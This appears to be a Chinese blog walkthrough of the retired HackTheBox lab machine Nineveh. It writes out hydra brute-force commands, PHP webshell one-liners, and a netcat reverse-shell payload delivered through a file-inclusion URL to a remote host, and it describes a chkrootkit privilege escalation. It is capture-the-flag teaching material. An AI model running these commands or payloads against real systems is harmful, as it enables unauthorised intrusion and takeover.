zoukankan      html  css  js  c++  java
  • HTB-靶机-Nineveh

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.43

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令

    autorecon 10.10.10.43 -o ./nineveh-autorecon

    最终的扫描结果

    gobuster dir -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -o bmfx-nineveh.gobusters -t 100

    gobuster dir -u https://nineveh.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o bmfxhttps-nineveh.gobusters -k -t 100

    根据上面扫出来的目录,都访问看看,得到如下

    顺手看你了下网页源代码

    得知用户名可能就是admin,密码就爆破下

    hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"

    使用hydra进行爆破,得出密码

    登录进去之后点击了每个功能点看到一个可疑的请求

    猜测可能存在LFI,这里刚开始测试有点问题,最后才知道代码里面写了需要关键字才可执行

    有文件包含就得有其他途径配合,上面扫描的结果中80端口已经探测的差不多了,看看443端口,有两个地址,一个是db另一个是secure_notes ,先访问db看看

    是个phpLiteAdmin 1.9搜索下有没有漏洞可以利用

    还真有,目标就写的1.9版本,拿八九不离十就可以利用看看,先用那个方便的远程代码执行漏洞

    大概意思就是新建一个后缀为php的数据库然后里面新建一个字段带上php小马就可以了,但目前的问题是需要认证,没有登录密码,需要先破解密码,我这里还是使用hydra进行破解

    hydra 10.10.10.43 -l user -P /usr/share/seclists/Passwords/Leaked-Databases/phpbb.txt https-post-form "/db/index.php:password=^PASS^&proc_login=true:Incorrect password"

    这里需要注意一下,因为破解的目标不需要输入用户名,所以这里使用hydra进行破解可以随便指定一个用户就可以,密码是需要指定靠谱的字典进行爆破

    得到密码登录上去,按照上面提到的exploit方式进行操作

    这里需要注意的是,利用本靶机的LFI需要带关键字ninevehNotes,否则不能正常执行,我这就搞了有点时间,后来导致这类原因是我成功拿到目标权限查看代码得知,这里也看经验,有经验的话可能一下就猜出来是这样,没有的话,就看前面的信息搜集,搜集好的话有提示也能搞出来,所以php的代码执行时下面的一种都可以,当然其他形式只要能执行都可以

    <?php echo system($_GET["bmfx"]); ?>
    <?php echo system($_REQUEST["bmfx"]); ?>

    成功之后就是这样

    到这里没啥问题就可以直接反弹shell了

    http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&bmfx=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.5+8833+>/tmp/f

    反弹的命令:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.5+8833+>/tmp/f

    访问上面的连接即可成功反弹shell

    到用户的家目录翻看user.txt发现没有权限,看来是要横向提权到普通用户amrois ,这里卡了一会,回头看上面收集的信息,发现还有扫描出来的目录没看呢,访问看看

    复制上面图片地址,使用wget下载下来看看

    图片的话要看看地理位置信息,要看看隐写信息,要么就看看关键字符,这里使用strings查看下

    发现用户amrois的私钥,直接拿到本地来连接登录,连接不上, 想起来扫描的时候22端口没开,然后在反弹的shell中执行网络连接命令,确认端口22是开放的,但是外面访问不了,此时如果有经验的话就知道使用了knock服务,需要敲击端口开放22端口

    根据上面得到的敲击信息,直接敲一把

    22端口开了,迅速使用密钥登录目标

    成功拿到user.txt ,使用pspy枚举下当前运行的进程相关信息,下载地址:https://github.com/DominicBreuker/pspy/blob/master/README.md ,得出来目标靶机运行了chkrootkit

    chkrootkit有一个本地提权漏洞,https://www.exploit-db.com/exploits/38775 不管是啥版本,先利用一把试试 ,看了提权代码,最终是要做的就是此程序会以root身份周期性执行/tmp/update的文件,所以我们只需要新建tmp目录下的update文件,里面写入反弹shell代码即可

    这里使用哪个用户都可以成功,我这测试就是www-data用户

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    Asp.net button防止点击多次数据提交
    Asp.net button防止点击多次数据提交
    Asp.net button防止点击多次数据提交
    被投资人坑的大学生创业者
    分析了3200家创业公司
    移动互联网4种引流思维:免费思维、跨界思维、平台思维、金融思维
    腾讯入局、估值超10亿美元,“野路子”瑞幸的三大增长法则
    95后女生月入8万,竟然“玩着玩着”就赚到钱
    95后中介年入百万:“伪焦虑”是你人生最大的骗局
    一家靠收智商税盈利的公司,卖了340亿
  • 原文地址:https://www.cnblogs.com/autopwn/p/13985366.html
Copyright © 2011-2022 走看看